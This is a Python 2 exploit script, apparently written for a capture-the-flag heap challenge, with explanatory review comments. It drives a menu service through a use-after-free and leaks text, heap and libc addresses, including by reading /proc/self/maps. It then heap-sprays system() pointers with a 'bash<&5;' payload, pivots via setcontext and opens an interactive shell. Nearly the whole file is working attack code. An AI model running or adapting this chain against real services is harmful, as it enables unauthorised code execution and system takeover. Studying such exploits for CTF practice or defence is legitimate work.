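#!/usr/bin/env python2

try:
    import binexpect
except ImportError:
    # The builtin `exit` is only installed by the site module (it is missing
    # under `python -S`); sys.exit is the portable way to abort with a message.
    # The import lives here because this branch runs before the module-level
    # imports further down.
    import sys
    sys.exit("""
pexpect sucks for sending binary data. binexpect fixes this and can be
found at this url: http://darksaber.tk/wapiflapi/binexpect.py Not sure
if the file will be there for ever, but you don't need this anyway.

Code your own sploit ;)
@wapiflapi
""")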
  14.  
  15. import struct
  16.  
# The note claiming the favorite item's memory
# should be the only note to use this size.
note_size = 24
def note(data, pad="n"):
    """Right-pad *data* with the single character *pad* to note_size - 1 bytes.

    str.ljust never truncates, so input that is already longer is returned
    as-is.  The one-byte gap below note_size presumably leaves room for the
    newline appended by sendline (not verified here).
    """
    width = note_size - 1
    return data.ljust(width, pad)
  22.  
if __name__ == '__main__':

    # Proof-of-concept driver against a local instance of the challenge
    # service.  Every step waits for the literal menu prompt and then sends
    # one or more menu choices; the menu numbers and the hex offsets below
    # are specific to the build this was written for.
    #
    # NOTE(review): the whole chain relies on the "favorite item" keeping a
    # pointer into memory that is freed at step "del item" and later reused
    # by a note (a dangling pointer / use-after-free).  From a defensive
    # standpoint, invalidating that pointer when the item is deleted would
    # presumably remove the primitive every later step depends on.
    target = binexpect.spawn("nc localhost 37717", timeout=None)


    # SETUP USE AFTER FREE SITUATION

    # Setup note0 in the fav item's memory.
    target.expect('Choose an option:')
    target.sendline("6\n0")     # add item
    target.expect('Choose an option:')
    target.sendline("9\n0")     # set fav
    target.expect('Choose an option:')
    target.sendline("8\n0")     # del item
    target.expect('Choose an option:')
    target.sendline('2\n')      # add note
    # note() pads to note_size - 1 so the new note lands in the freed
    # item's chunk (see the comment on note_size).
    target.sendline(note("", "o"))


    # LEAK TEXT, HEAP & LIBC ADDRESSES

    # Change fav type and leak text address.
    target.expect('Choose an option:')
    target.sendline("10\n1")    # change fav type
    target.expect('Choose an option:')
    target.sendline('1')        # list notes
    # The listing prints 6 raw bytes of a pointer; they are padded to 8
    # bytes so struct "Q" can decode a 64-bit little-endian value.
    target.expect(' #0: (.{6})')
    base_text = struct.unpack("Q", target.match.group(1) + b'\x00\x00')[0]
    print "base_text: 0x%.16x" % base_text

    # Compute other gadgets.
    # Both offsets are constants relative to the leaked text address and
    # are not derived at runtime; a different build invalidates them.
    dump = base_text - 0xd0     # note_from_file() pointer used by the menu
    free = base_text + 0x288    # GOT entry for free()

    # Free note and leak heap address.
    target.expect('Choose an option:')
    target.sendline("3\n0")     # change note
    target.sendbinline(note(struct.pack("Q", free)))
    target.expect('Choose an option:')
    target.sendline("11")       # trigger UAF
    target.expect('Choose an option:')
    target.sendline('1')        # list notes
    target.expect(' #0: (.{6})')
    # Same 6-byte pointer leak as above; ljust(8, b'\0') is equivalent to
    # the explicit + b'\x00\x00' used for base_text.
    base_heap = struct.unpack("Q", target.match.group(1).ljust(8, b'\0'))[0]
    # reclaim freed space from note0 in note1
    target.expect('Choose an option:')
    target.sendline('2')        # add note
    target.sendline(note("", "o"))
    print "base_heap: 0x%.16x" % base_heap

    # Read /proc/self/maps and leak libc address.
    # The service is made to open a path of the client's choosing; the
    # first mapping line it echoes back is parsed as note #2.
    target.expect('Choose an option:')
    target.sendline("3\n0")     # change note
    target.sendbinline(note(struct.pack("Q", dump)))
    target.expect('Choose an option:')
    target.sendline("11")       # trigger UAF
    target.sendline("/proc/self/maps")
    target.expect('Choose an option:')
    target.sendline("1")        # list notes
    # Only the start address of the "start-end" range is captured.
    target.expect("#2: ([0-9a-fA-F]+)-[0-9a-fA-F]+")
    base_libc = int(target.match.group(1), 16)
    target.expect('Choose an option:')
    target.sendline('5\n2')     # del note
    # NOTE(review): the mapping picked up by the regex is assumed to be
    # libc.  When the process runs under gdb (ASLR off) it is a fixed
    # binary base instead, which this check detects, and a hard-coded
    # libc base is substituted.
    if base_libc == 0x0000555555554000:
        print "gdb detected, adjusting libc."
        base_libc = 0x00007ffff7a14000
    print "base_libc: 0x%.16x" % base_libc


    # HEAP SPRAYING

    # libc-relative constant for the build this targets; see note above.
    system = base_libc + 0x468f0
    payload = "bash<&5;" # Should be 8 bytes.

    # Eight notes, each 16 bytes of padding + 8-byte payload + 8-byte
    # pointer, so every sprayed note has the same layout.
    print "Heap spraying with system."
    for x in xrange(8):
        target.expect('Choose an option:')
        target.sendline('2')    # add note
        target.sendbinline(" " * 16 + payload + struct.pack("Q", system))

    # Deletes slot 2 eight times; the note array is emptied but the
    # sprayed chunks presumably stay intact on the heap (see next comment).
    print "Deleting notes in order to empty the array."
    for _ in xrange(8):
        target.expect('Choose an option:')
        target.sendline('5\n2') # del note

    # Shouldn't overwrite the previous ones since
    # those have a different size.
    print "Filling array with pointers to payload."
    for x in xrange(8):
        target.expect('Choose an option:')
        target.sendline('2')    # add note
        # 15 + 8 bytes = note_size - 1, one byte shorter than the spray.
        target.sendline(" " * 15 + payload)


    # SETCONTEXT

    print "Setting up trampoline."
    # Another libc-relative constant (a fixed offset into setcontext);
    # build-specific like the others.
    setcontext = base_libc + 0x47490 + 87
    target.expect('Choose an option:')
    target.sendline('2')
    target.sendbinline(struct.pack("Q", setcontext))

    print "Calling setcontext."
    # Heap-relative offset to the note written just above (hard-coded).
    trampoline = base_heap + 0x370
    target.expect('Choose an option:')
    target.sendline("3\n0")
    target.sendbinline(note(struct.pack("Q", trampoline)))
    target.expect('Choose an option:')
    target.sendline("11")

    # Get a proper shell.
    # Pause so the operator can watch the result, then hand the terminal
    # over; interact() presumably returns when the escape character is typed.
    raw_input("Got you a shell. Escape character is '^]'. ok? ")
    target.sendline("""python -c 'import pty; pty.spawn("bash")' 1>&0 2>&0""")
    target.interact()

    print "Bye bye."